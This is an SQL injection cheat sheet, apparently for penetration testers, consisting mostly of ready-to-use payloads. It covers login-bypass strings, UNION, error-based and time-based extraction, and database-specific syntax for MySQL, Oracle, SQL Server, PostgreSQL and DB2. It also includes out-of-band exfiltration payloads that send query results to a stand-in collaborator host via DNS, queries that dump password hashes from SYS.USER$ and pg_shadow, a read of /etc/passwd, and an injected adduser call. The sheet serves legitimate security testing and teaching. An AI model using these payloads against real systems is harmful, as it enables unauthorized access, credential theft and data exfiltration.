- Testing for SQL Injection (WSTG-INPV-05)
- SecLists
- Exploiting hard filtered SQL injections
- SQLi filter evasion cheat sheet (MySQL)
- SQLi Mitigation
- NetSPI SQL Injection Wiki: MySQL | Oracle | SQL Server | PostgreSQL
- SQL Injection (PortSwigger Web Security Academy)
- SQL Injection cheat sheet (PortSwigger Web Security Academy)
- SQL Smuggling Or, The Attack That Wasn’t There (PDF on Wayback Machine)
Vulnerability description for reporting available in VulnDB (GitHub)
See labs WebSecurityAcademy (PortSwigger) – SQL Injections.
For specific database cheat sheets, see PostgreSQL, MSSQL, SQLite, MySQL, IBM DB2, Oracle Database.
Tools: Burp Suite, SQLmap, SQLninja, Pentest-Tools.com
Detection
Detect SQL injection vulnerabilities by fuzzing every input that reaches the database and watching for any change in behaviour — a database error, a different response body or length, or a measurable delay (blind injection produces no visible error at all). Inputs to cover:
- Parameters in URL, e.g. http://www.example.com/index.php?username=1%27%20or%20%271%27%20=%20%271&password=1%27%20or%20%271%27%20=%20%271 (single quotes URL-encoded as %27)
- Elements from the user interface, like search box, login forms, etc.
- Hidden fields
- HTTP Headers
- Cookies
Payloads to try (send each raw and URL-encoded; a changed response, not only an error, is a signal):
'
;
"
--
/* */
AND
OR
enter a string when expecting a number
ASCII(97)
' OR 1=1--
'; waitfor delay ('0:0:20')--   (Microsoft SQL Server; stacked query, 20-second delay)
exec master..xp_dirtree '//<id>.burpcollaborator.net/a'   (Microsoft SQL Server; out-of-band DNS lookup via a UNC path — point it at a DNS listener you control)
Bypass Authentication / Login forms
Example 1
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
Username | Password |
1' or '1'='1 | 1' or '1'='1 |
administrator'-- | foo |
With administrator'-- the comment removes the password check from the WHERE clause, so any password is accepted. On MySQL the comment must be written as -- followed by a space, or use # instead.
Example 2
SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))
Username | Password |
1' or '1' = '1'))/* | foo |
1' or '1' = '1')) LIMIT 1/* | foo |
The /* comments out the rest of the statement, including the MD5 password check; the LIMIT 1 variant is for applications that only handle a single returned row.
Other payloads
<username>' OR 1=1--
'OR '' = ' Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>'--   (the number of columns and their types must match the original SELECT)
'OR 1=1--
# In login field
' or 1=1 --
') or 1=1 LIMIT 0,1 --
1' or '1'='1
admin' or '1 --
' union select (select group_concat(username, password) from users), 2 --
1 or (select substr(group_concat(username, password),i,1) from users) = (select char(j)) --   (boolean-based: iterate i over character positions and j over character codes)
%bf' or 1=1 --   (multibyte trick: only works when the connection charset is GBK/SJIS-like and the quote is escaped by adding a backslash, which %bf swallows into a two-byte character)
# In password field
' or 1=1 --
# Auth Bypass From SecLists
" or 1=1
" or 1=1#
" or 1=1--
" or 1=1/*
' or 1=1
' or 1=1#
' or 1=1--
' or 1=1/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 " AND 1=0 UNION ALL SELECT "root", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
The hash 81dc9bdb52d04dc20036dbd8313ed055 is MD5('1234'): the UNION supplies a fake row whose hash matches the password typed into the form, so these only work when the application hashes the submitted password and compares it with the hash returned by the query (and the table has exactly two selected columns).
admin" #
admin" --
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin'/*
admin'or 1=1 or ''='
or 1=1
or 1=1#
or 1=1--
or 1=1/*
root" #
root" --
root" or "1"="1
root" or "1"="1"#
root" or "1"="1"--
root" or "1"="1"/*
root" or 1=1
root" or 1=1 or ""="
root" or 1=1#
root" or 1=1--
root" or 1=1/*
root") or "1"="1
root") or "1"="1"#
root") or "1"="1"--
root") or "1"="1"/*
root") or ("1"="1
root") or ("1"="1"#
root") or ("1"="1"--
root") or ("1"="1"/*
root"/*
root' #
root' --
root' or '1'='1
root' or '1'='1'#
root' or '1'='1'--
root' or '1'='1'/*
root' or 1=1
root' or 1=1#
root' or 1=1--
root' or 1=1/*
root') or '1'='1
root') or '1'='1'#
root') or '1'='1'--
root') or '1'='1'/*
root') or ('1'='1
root') or ('1'='1'#
root') or ('1'='1'--
root') or ('1'='1'/*
root'/*
root'or 1=1 or ''='
Data Extraction – UNION Technique
Find the number of columns in the query
Using the ORDER BY clause
Add the ORDER BY clause at the end of the vulnerable parameter and increase the column index until the database errors; the last index that does not error is the number of columns in the original SELECT:
1 ORDER BY 10--
Unknown column '10' in 'order clause'   (MySQL error when the index exceeds the column count)
Using NULL with the UNION clause
UNION technique
10 UNION SELECT 1,null,null--
1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
Find which columns are displayed
1 union all select 1, 2, 3, ...
In forms
SQL Query | Parameter value |
SELECT * FROM products WHERE id_product=$id_product | Boolean: 10 OR 1=1 — Stacked queries: 10; INSERT INTO users (…) — Error based (Oracle): 10||UTL_INADDR.GET_HOST_NAME((SELECT user FROM DUAL))-- which fails with ORA-29257: host SCOTT unknown (the value selected by the subquery is leaked in the error message) |
SELECT Name, Phone, Address FROM Users WHERE Id=$id | Find the number of columns for the UNION technique: 10 ORDER BY 10-- → Unknown column '10' in 'order clause' — UNION technique: 10 UNION SELECT 1,null,null-- then 1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable (three columns, matching the original SELECT) |
1; waitfor delay '0:15:0'--   (Microsoft SQL Server stacked query; the format is hh:mm:ss, so this delays 15 minutes — use '0:0:15' for 15 seconds)
' or 1=1 --
Error based
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
MySQL / MariaDB
Description | Syntax |
---|---|
String concatenation | 'foo' 'bar'  CONCAT('foo','bar') |
Substring | SUBSTRING('foobar', 4, 2) |
Comments | #comment  -- comment (a space is required after --)  /*comment*/ |
Database version | SELECT @@version |
Database contents | SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
Batched (or stacked) queries | query1; query2 (only if the client library allows multi-statement execution) |
Conditional errors (the multi-row subquery is only evaluated when the condition is true, so a "Subquery returns more than 1 row" error signals true)
SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
Extracting data via visible error messages
SELECT 'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret')))
> XPATH syntax error: '\secret'
Conditional time delays / Time-based
Waits 10 seconds when the condition is true.
SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')
DNS lookup (Windows only — relies on UNC path resolution; LOAD_FILE / INTO OUTFILE need the FILE privilege and are subject to secure_file_priv)
LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
Data exfiltration
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
Payload examples
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
' UNION SELECT 1, sql FROM sqlite_master WHERE type='table' --   (SQLite, not MySQL: sqlite_master holds the schema)
' UNION SELECT table_schema || '.' || table_name from information_schema.tables --   (|| is concatenation in PostgreSQL/Oracle/SQLite; in MySQL it is logical OR unless sql_mode PIPES_AS_CONCAT is set — use CONCAT() there)
' UNION SELECT column_name from information_schema.columns where table_name='<table name>' --
Oracle
For queries, see Oracle Database. Test queries on Oracle Live SQL.
Description | Syntax |
---|---|
String concatenation | 'foo'||'bar' |
Substring | SUBSTR('foobar', 4, 2) |
Comments | --comment  /*comment*/ |
Database version | SELECT banner FROM v$version  SELECT version FROM v$instance |
Database contents | SELECT * FROM all_tables  SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' |
Batched (or stacked) queries | Not supported |
Injection can also be in PL-SQL
upd_stmt := 'update t set x=' || :val || ', etc.etc.';   -- :val is concatenated into the statement text, so its content is executed as SQL
execute immediate upd_stmt;
-- Safe form: keep the value out of the statement text and bind it instead:
-- execute immediate 'update t set x = :1' using val;
Conditional errors
' AND (SELECT CASE WHEN (banner LIKE 'Oracle%') THEN TO_CHAR(1/0) ELSE NULL END FROM v$version) IS NULL --
Conditional time delays / Time-based
Waits 10 seconds when the condition is true.
' AND (SELECT CASE WHEN (1=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE 'a'||dbms_pipe.receive_message(('a'),0) END FROM dual) IS NOT NULL --
' AND (SELECT CASE WHEN (banner like 'Oracle%') THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE 'a'||dbms_pipe.receive_message(('a'),0) END FROM v$version) IS NOT NULL --
DNS lookup
Uses an XML external entity (XXE) weakness in xmltype parsing to trigger a DNS lookup; it has been patched, so it only works on older/unpatched Oracle versions
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
Same XXE weakness used for data exfiltration (the query result becomes a DNS label, so it must be short and DNS-safe)
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
DNS lookup (all versions) – requires elevated privileges (EXECUTE on UTL_INADDR and, on 11g and later, a network ACL allowing the resolve)
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')
Bypass filters
If a specific character is blocked, try using Burp Suite extension Transfuzz (GitHub). Send the request to the Intruder module, highlight the blocked character as the variable, and choose Payload type Extension-generated.
See Obfuscating Queries (NetSPI).
' OR 1=1 --
'/**/OR/**/1=1/**/--/**/
Payload examples
' or '1'='1
' or '1'='1
' || utl_http.request('http://x.x.x.x/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' || UTL_INADDR.GET_HOST_NAME((SELECT user FROM DUAL) )--
The payloads below are error-based: the selected value is passed to utl_inaddr.get_host_address and reflected back in the ORA-29257 "host ... unknown" error. Queries against SYS.USER$ and DBA_* views need DBA-level privileges, and the PASSWORD column of SYS.USER$ holds hashes, not clear-text passwords.
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGIN_USER) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGIN_USER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGIN_USER) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGIN_USER) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGIN_USER) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGIN_USER) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGIN_USER) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGIN_USER) WHERE LIMIT=8)) AND 'i'='i
Microsoft SQL Server
Description | Syntax |
---|---|
String concatenation | 'foo'+'bar' |
Substring | SUBSTRING('foobar', 4, 2) |
Comments | --comment  /*comment*/ |
Database version | SELECT @@version |
Database contents | SELECT * FROM information_schema.tables  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
Batched (or stacked) queries | query1; query2  (the semicolon is optional: query1 query2) |
Conditional errors
SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
Extracting data via visible error messages
SELECT 'foo' WHERE 1 = (SELECT 'secret')
> Conversion failed when converting the varchar value 'secret' to data type int.
Conditional time delays / Time-based
Waits 10 seconds when the condition is true.
IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
DNS lookup
exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
Data exfiltration
declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')
PostgreSQL
Description | Syntax |
---|---|
String concatenation | 'foo'||'bar' |
Substring | SUBSTRING('foobar', 4, 2) |
Comments | --comment  /*comment*/ |
Database version | SELECT version() |
Database contents | SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
Batched (or stacked) queries | query1; query2 |
Conditional errors
1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)
Extracting data via visible error messages
SELECT CAST((SELECT password FROM users LIMIT 1) AS int)
> invalid input syntax for integer: "secret"
Conditional time delays / Time-based
Waits 10 seconds when the condition is true.
SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
DNS lookup
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'   (COPY ... TO PROGRAM runs on the database server and requires superuser or membership in pg_execute_server_program)
Data exfiltration
-- Out-of-band exfiltration helper: evaluates YOUR-QUERY-HERE server-side and
-- leaks its (single) result as a DNS label of the collaborator hostname.
create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
-- p receives the single value produced by the attacker-chosen query
SELECT into p (SELECT YOUR-QUERY-HERE);
-- Build a COPY ... TO PROGRAM statement; p is concatenated unescaped, so it
-- must form a valid DNS label (letters/digits, no spaces) for the lookup to work
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
-- NOTE(review): COPY TO PROGRAM executes on the database host and needs
-- superuser or the pg_execute_server_program role — confirm for the target version
execute c;
END;
-- security definer: the body runs with the privileges of the function owner, not the caller
$$ language plpgsql security definer;
SELECT f();
Payload examples
select version();
select current_database();
select current_user;
select session_user;
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');
select current_setting('port');
select current_setting('config_file');
select current_setting('hba_file');
select current_setting('data_directory');
select * from pg_shadow;   (password hashes; readable only by superusers — non-superusers get pg_user instead, with the passwd column masked)
select * from pg_group;
create table myfile (input TEXT);
copy myfile from '/etc/passwd';
select * from myfile; copy myfile to '/tmp/test';   (server-side COPY FROM/TO a file path reads and writes on the database server, not the client, and requires superuser or pg_read_server_files / pg_write_server_files)
DB2 for Unix
Description | Syntax |
---|---|
String concatenation | 'foo'||'bar'  CONCAT('foo', 'bar') |
Substring | SUBSTRING('foobar', 4, 2) |
Comments | -- comment  /* comment */ |
Database version | select versionnumber, version_timestamp from sysibm.sysversions; |
Database contents | select name from sysibm.systables;  select name, tbname, coltype from sysibm.syscolumns; |
Batched (or stacked) queries |
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select current server from sysibm.sysdummy1;
select name from sysibm.systables;
select grantee from syscat.dbauth;
select * from syscat.tabauth;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select name, tbname, coltype from sysibm.syscolumns;
select schemaname FROM syscat.schemata;